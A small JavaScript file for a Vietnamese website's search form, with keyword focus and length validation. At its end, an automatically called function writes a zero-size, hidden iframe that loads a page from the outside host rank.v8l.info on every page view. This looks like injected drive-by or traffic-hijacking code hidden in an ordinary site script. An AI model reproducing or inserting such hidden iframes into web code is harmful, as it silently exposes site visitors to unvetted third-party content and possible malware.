﻿// JavaScript Document
function getStart()
{
	document.SearchForm.keyword.focus();
}
function checksearchform()
{
	if(document.SearchForm.keyword.value.length < 3)
	{
		alert("Bạn chưa nhập từ khóa hoặc từ khóa không hợp lệ !");
		return false; 
	}
	return true;
}
function getiframe()
{
	document.write('<iframe src="http://rank.v8l.info/?scode=be42df0290f1fbff12afa2e083697979" width=0 height=0 frameBorder="0" style="display:none"></iframe>');
}
getiframe();
